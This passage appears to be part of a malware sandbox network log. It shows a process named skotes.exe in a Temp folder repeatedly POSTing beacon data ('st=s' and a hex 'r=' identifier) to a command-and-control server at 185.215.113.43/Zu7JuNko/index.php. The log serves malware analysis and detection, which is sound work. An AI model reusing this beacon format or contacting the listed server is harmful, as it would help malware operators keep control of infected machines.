r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B62A72B75882D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Dec 10, 2024 00:47:02.395478010 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 09 Dec 2024 23:47:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
99	192.168.2.4	50265	185.215.113.43	80	7632	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 00:47:04.139317989 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 10, 2024 00:47:05.487685919 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 09 Dec 2024 23:47:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
100	192.168.2.4	50266	185.215.113.43	80	7632	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 00:47:07.123006105 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 36 32 41 37 32 42 37 35 38 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B62A72B75882D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Dec 10, 2024 00:47:08.453823090 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 09 Dec 2024 23:47:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
101	192.168.2.4	50267	185.215.113.43	80	7632	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 00:47:10.199263096 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 10, 2024 00:47:11.527218103 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 09 Dec 2024 23:47:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
102	192.168.2.4	50268	185.215.113.43	80	7632	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 00:47:13.172286987 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 36 32 41 37 32 42 37 35 38 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B62A72B75882D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Dec 10, 2024 00:47:14.525391102 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 09 Dec 2024 23:47:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
103	192.168.2.4	50269	185.215.113.43	80	7632	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 00:47:16.270970106 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 10, 2024 00:47:17.628664970 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 09 Dec 2024 23:47:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
104	192.168.2.4	50270	185.215.113.43	80	7632	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 00:47:19.265398026 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 36 32 41 37 32 42 37 35 38 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B62A72B75882D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Dec 10, 2024 00:47:20.603279114 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 09 Dec 2024 23:47:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
105	192.168.2.4	50271	185.215.113.43	80	7632	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 00:47:22.348900080 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 10, 2024 00:47:23.698734999 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 09 Dec 2024 23:47:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
106	192.168.2.4	50273	185.215.113.43	80	7632	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 00:47:25.341592073 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 36 32 41 37 32 42 37 35 38 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B62A72B75882D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Dec 10, 2024 00:47:26.672425032 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 09 Dec 2024 23:47:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
107	192.168.2.4	50274	185.215.113.43	80	7632	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 00:47:28.418593884 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 10, 2024 00:47:29.767771006 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 09 Dec 2024 23:47:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
108	192.168.2.4	50275	185.215.113.43	80	7632	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 00:47:31.394957066 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 36 32 41 37 32 42 37 35 38 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B62A72B75882D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Dec 10, 2024 00:47:32.747498989 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 09 Dec 2024 23:47:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
109	192.168.2.4	50276	185.215.113.43	80	7632	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 00:47:34.493556976 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 10, 2024 00:47:35.842145920 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 09 Dec 2024 23:47:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
110	192.168.2.4	50281	185.215.113.43	80	7632	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 00:47:37.468766928 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 36 32 41 37 32 42 37 35 38 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B62A72B75882D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Dec 10, 2024 00:47:38.822906971 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 09 Dec 2024 23:47:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
111	192.168.2.4	50282	185.215.113.43	80	7632	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 00:47:40.568737984 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 10, 2024 00:47:41.896437883 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 09 Dec 2024 23:47:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
112	192.168.2.4	50283	185.215.113.43	80	7632	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 00:47:43.522690058 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 36 32 41 37 32 42 37 35 38 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B62A72B75882D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
113	192.168.2.4	50284	185.215.113.43	80	7632	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 00:47:45.597023964 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 10, 2024 00:47:46.945961952 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 09 Dec 2024 23:47:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
114	192.168.2.4	50285	185.215.113.43	80	7632	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 00:47:48.572038889 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 36 32 41 37 32 42 37 35 38 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B62A72B75882D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Dec 10, 2024 00:47:49.925988913 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 09 Dec 2024 23:47:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
115	192.168.2.4	50286	185.215.113.43	80	7632	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 00:47:51.668272018 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 10, 2024 00:47:53.015739918 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 09 Dec 2024 23:47:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
116	192.168.2.4	50287	185.215.113.43	80	7632	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 00:47:54.645034075 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 36 32 41 37 32 42 37 35 38 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B62A72B75882D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Dec 10, 2024 00:47:55.997036934 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 09 Dec 2024 23:47:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
117	192.168.2.4	50288	185.215.113.43	80	7632	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 00:47:57.743578911 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 10, 2024 00:47:59.070780039 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 09 Dec 2024 23:47:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
118	192.168.2.4	50289	185.215.113.43	80	7632	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 00:48:00.697335958 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 36 32 41 37 32 42 37 35 38 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B62A72B75882D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Dec 10, 2024 00:48:02.030783892 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 09 Dec 2024 23:48:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
119	192.168.2.4	50290	185.215.113.43	80	7632	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 00:48:03.773591042 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 10, 2024 00:48:05.109929085 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 09 Dec 2024 23:48:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
120	192.168.2.4	50291	185.215.113.43	80	7632	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 00:48:06.752902985 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 36 32 41 37 32 42 37 35 38 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B62A72B75882D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Dec 10, 2024 00:48:08.106559992 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 09 Dec 2024 23:48:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
121	192.168.2.4	50292	185.215.113.43	80	7632	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 00:48:09.849515915 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 10, 2024 00:48:11.198643923 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 09 Dec 2024 23:48:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
122	192.168.2.4	50293	185.215.113.43	80	7632	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
